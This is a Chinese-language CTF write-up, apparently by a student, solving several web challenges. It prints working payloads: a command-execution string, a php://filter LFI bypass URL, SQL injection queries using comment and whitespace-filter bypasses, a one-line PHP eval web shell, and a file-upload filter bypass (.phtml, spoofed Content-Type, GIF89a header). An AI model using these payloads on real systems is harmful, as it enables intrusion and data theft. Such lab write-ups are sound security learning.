Web

一、

image-20220327233452661

查看页面源代码

image-20220327233614658

大意了 忘记解码了

image-20220327233646645

flag{first_cjlusec}

二、

image-20220327233732773

Window系统是大小写不敏感,所以输入?d=system('type flag.php');

image-20220327233757344

右键查看源代码

image-20220327233920442

有了

flag{Second_cjluSec}

三、

image-20220327234210116

用双写php://的方法

http://47.110.49.25/pass-3/?file=phphp://p://filter/read=convert.base64-encode/resource=flag.php

image-20220327234234749

通过base64解码

image-20220327234253750

最后

flag{zhn_didi_cjluSec}

四、

image-20220327234332150

这题好难 就是说查了八百次php反序列化做的

得到一串加密字符PD9waHANCiBlY2hvICJmbGFn1NrExMTYIj8NCi8vJGZsYWc9ZmxhZ3ttMHRoZXJfZnUzY2tlcl96aG59

image-20220327234357529

flag{m0ther_fu3cker_zhn}

五、

image-20220327234417605

?n[]=0

image-20220327234440290

flag{daeq5q2wdas32dqw}

六、

image-20220327234457487

一看就很熟悉 SQL注入

第一步.输入?id=1

image-20220327234514385

接着就是正常步骤order by 啥啥的

image-20220327234529935

但是好像没那么轻松 这个全都连一起了是什么鬼 猜想肯定是出题人无聊多搞了个空格过滤

image-20220327234550320

咱真的是很努力在尝试了 最后发现 %09 可以绕过

输入

?id=1")and(1=1)%23

输入

http://47.110.49.25/pass-6/Less-4/?id=-1%22)union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name=%27users%27%23

image-20220327234614424

flag{zwqgg_handsome}

七、

image-20220327235115164

啊我不会

八、

image-20220327235631083

一道文件上传题 抓包 修改参数 上传一句话木马

image-20220327235837176

上传成功 把start/去掉

image-20220327235959434

这样显示就是正确的 因为上面的一直蚁剑连不上 所以我们改一句木马

<?php @Eval($_POST['a']);?>

重新传

image-20220328000017057

成功连接 最后找半天flag没找到 原来在key.php里 美女无语

image-20220328000213231

key2:a1b2c3d4

最后学到了一个绝杀的

image-20220328000233632

把这几样一修改 全可以绕过

filename=xxx.phtml

content-Type=image-jpeg


GIF89a

<?php phpinfo(); ?>

做完就是感觉好难 主要是自己比较菜哈哈哈 继续加油好不啦